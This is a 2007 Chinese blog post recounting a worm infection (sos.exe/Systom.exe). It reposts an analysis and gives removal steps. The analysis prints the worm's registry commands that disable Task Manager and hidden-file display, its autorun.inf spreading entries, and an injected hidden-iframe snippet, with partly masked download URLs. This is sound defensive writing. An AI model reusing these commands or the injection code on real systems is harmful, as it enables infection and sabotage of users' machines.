病毒组团而来，我又有麻烦了

MrDuan 信息技术 2007-11-29 3547 0 windows

　　昨晚BitDefender Total Security2008 刚升完级让重启，我没重启，实时保护和防火墙均Disabled中，危险悄然而至，不知是那个网页，刚一打开，360就频繁报告发现木马要增加启动项、挂钩子，害的我手忙脚乱的点禁止、点卸载。硬盘狂响，赶忙禁用网卡，重新启动到安全模式，首先删除Internet 临时文件，Windows临时文件夹下的东东，然后用360Safe查流行木马、恶意插件，结果查出来有４个木马，清除掉了。查注册表，查进程。。。这时发现任务管理器被禁用，显示、隐藏文件选项也被禁用，打开WinRar，用它暂时充当资源管理器，发现C盘根目录下有个SOS.exe文件很可疑，改其扩展名为非exe。这时又发现，系统日期被改成了2000年11月29日，遂查找“修改日期为2000年11月29日”的所有文件，找到后观察“修改时间”，移动几个在中毒时间点修改的文件，Windows\Fonts文件夹下居然也让病毒做了备份。C盘检查完后，检查其余盘，发现每个盘下均有SOS.exe，基本可以确定这是个病毒文件了，先不删除它，只改掉扩展名。接着请出BitDefender进行Deep Scan，经过漫长的等等，查出病毒来了，没错就是这些文件，可恶啊！重启机子，恢复被禁用的任务管理器，显示隐藏文件选项等。恢复方法见任务管理器被禁用的解决方法、显示/隐藏不可用的解决方法，上网查这几个病毒的相关信息：

U盘病毒sos.exe,systom.exe的查杀

2007年11月12日星期一下午 07:28

作者：清新阳光 ( http://hi.baidu.com/newcenturysun)
日期：2007/11/11 (转载请保留此声明)

　　这是一个可以通过U盘传播的感染下载者，对系统有一定的破坏作用，是之前流行的crsss.exe病毒系列的一个新变种。

File: sos.exe
Size: 26624 bytes
Modified: 2007年11月11日, 13:32:04
MD5: 6955C9DE365BEDA81390DE069D5A67F5
SHA1: 4087A6F44E81F907F0DE0FB31C15E359A90680B5
CRC32: 870BA6FE
加壳方式：upx
AV命名：Worm.Win32.Agent.yzg（瑞星）

技术细节：
1.病毒运行后，衍生如下副本：
%systemroot%\system32\auToRun.inf
%systemroot%\system32\Systom.exe
在每个分区根目录下面生成auToRun.inf和Systom.exe，达到通过U盘等移动存储传播的目的。

2.调用reg.exe执行相应注册表操作：
(1)ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D
添加自身启动项目

(2)add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f
禁用windows自动更新

(3)add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 00000001 /f
禁用任务管理器

(4)add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t reg_dWord /d 00000000 /f
add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 00000000 /f
add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_SZ /d 0 /f
破坏显示隐藏文件的功能

(5)add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 00000001 /f
不显示文件的扩展名

(6)add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d
锁定主页

(7)add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
使得IE的主页设定选项不可选

3.检测带有如下字样的窗口并将其关闭
病毒
木马
检测
wpe

4.遍历所有磁盘分区删除*.gho文件，使得用户中毒后无法使用ghost恢复系统

5.遍历所有磁盘分区的INDEX.ASP，.HTM，INDEX.PHP，DEFAULT.ASP，DEFAULT.PHP，CONN.ASP文件
并在其尾部加入<IfrAmE src=http://www.*.cn/mywm/index.htm width=0 height=0></IfrAmE>的代码

6.调用IE连接网络通过http://www.*.cn/cj/tj/tj.asp进行感染统计

7.自身连接网络下载http://www.*.cn/cj/xiao.txt
http://www.*.cn/cj/table.txt
和http://www.*.cn/cj/IEURL.txt
到%systemroot%\system32下面命名为h1.dll~h5.dll

三个文件均为网页文件

中毒后的sreng日志如下：
启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\Systom.exe> []

==================================
Autorun.inf
[C:\]
[AuToRun]
open=sos.exe
shell\open=打开(&O)
shell\open\Command=sos.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=sos.exe
[D:\]
[AuToRun]
open=sos.exe
shell\open=打开(&O)
shell\open\Command=sos.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=sos.exe
...
解决办法：
下载sreng：http://download.kztechs.com/files/sreng2.zip

启动计算机进入
安全模式下(开机后不断按F8键然后出来一个高级菜单选择第一项安全模式进入系统)

1.打开sreng
启动项目注册表删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\Systom.exe> []

系统修复－Windows Shell / IE
勾选如下选项

允许在Windows 2000/XP/Server 2003中使用任务管理器
设置主页为"about:blank"
允许Internet Explorer选项窗口和选项窗口的所有内容
显示隐藏文件

然后点击“修复”按钮

2.重启计算机

双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定
点击菜单栏下方的文件夹按钮（搜索右边的按钮）
在左边的资源管理器中单击打开系统所在盘
删除如下文件
%systemroot%\system32\auToRun.inf
%systemroot%\system32\Systom.exe
%systemroot%\system32\h1.dll~h5.dll

在左边的资源管理器中单击打开每个分区
删除每个分区根目录下面的sos.exe和auToRun.inf

3.修复被感染的网页文件
推荐使用CSI的iframekill
下载地址：http://www.7747.net/Soft/200711/7948.html

　　今天,同事的机器中毒了,是sos.exe.无法进入任务管理器.我首先使用了icesword结束了病毒进程.然后解决进入任务管理器的问题.实际上熟悉xp的朋友知道,可以用tasklist和taskkill来结束某些病毒进程.但操作要输入命令.太麻烦,本人觉得icesword很好.网上有下载的地方很多.使用也很方便.http://blog.cfan.com.cn/index.php/240418/action_viewspace_itemid_148459

当然瑞星卡卡,360,优化大师等都有结束任务的功能.就看你习惯什么了.

　　sos.exe有人写了专杀:http://bbs.cfan.com.cn/viewthread.php?tid=641024&extra=page%3D1&frombbs=1可参考,本人解决办法是使用XDelBox1.5来在dos下删除,当然配合使用icesword和sreng来使用,具体要删除的文件要看你的经验了.

下面是解决办法.

开始-运行-gpedit.msc 进入组策略管理器依次展开-用户配置-管理模版- 系统双击登录/注销里面“禁用任务管理器”

方法一：运行“Regedit”命令打开注册表编辑器，依次定位到“[HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System]”分支，在左边找到“DisableTaskMgr”项（如没有则新建，其类型为REG_DWORD），其值设置为1则禁止，为0则启用。

方法二：运行“gpedit.msc”命令打开“组策略”设置窗口，依次展开“本地计算机策略→用户配置→管理模板→系统→Ctrl+Alt+Del选项”，在右边的“删除任务管理器”的属性中，设置为“已启用”。

方法三：上面两种方法对所有用户有效，如果你想单独对某个用户设置禁用，那么可以打开C:\WINDOWS\system32目录，右键单击taskmgr.exe，选择“打开方式”菜单，在弹出的“运行身份”窗口中勾选“下列用户”，并指定一个用户即可。

摘自：http://blog.cfan.com.cn/html/18/240418_itemid_152157.html

一、“下载者28070”(Win32.Troj.Agent.yk.28070) 威胁级别：★★

　　这是一个下载者木马病毒，会从黑客网站上下载大量其他木马病毒。病毒运行之后，在用户系统盘目录%windows%system32下生成病毒文件systom.exe和auToRun.inf。然后，它开始修改注册表。病毒首先将之前生成的systom.exe加入启动项，以便实现自动启动。随后，它继续修改注册表，禁止windows系统的自动更新、禁止显示隐藏文件、禁止系统进入安全模式。并修改系统时间为2000年，导致部分杀毒软件失效。它还会搜索电脑中已有的安全软件进行映像劫持，致使安全软件无法使用，同时，病毒检查所有磁盘，通过已经存在systom.exe利用复制的方法，在系统各盘符中生成新的AUTO病毒：auToRun.inf和nx.exe，删除所有Ghost备文件（扩展名为.GHO），感染所有的网页文件，插入黑客网站代码。这样，当用户开启网页时，会被指向到黑客指定的网站。而且，病毒还会关闭含有“杀毒“、“木马”等字样的窗口，阻止受害用户上网寻找解决它的方案(此方法和AV终结者类似)。当完全破坏了计算机的安全系统，木马便开始畅通无阻地下载木马病毒。它连接http://*****love.cn/tongji/tj.asp和http://****80.com/xx.dll两个网址，分五次下载大量的其他木马病毒以及接收木马制作者的新指令，给计算机用户造成无法估计的损失。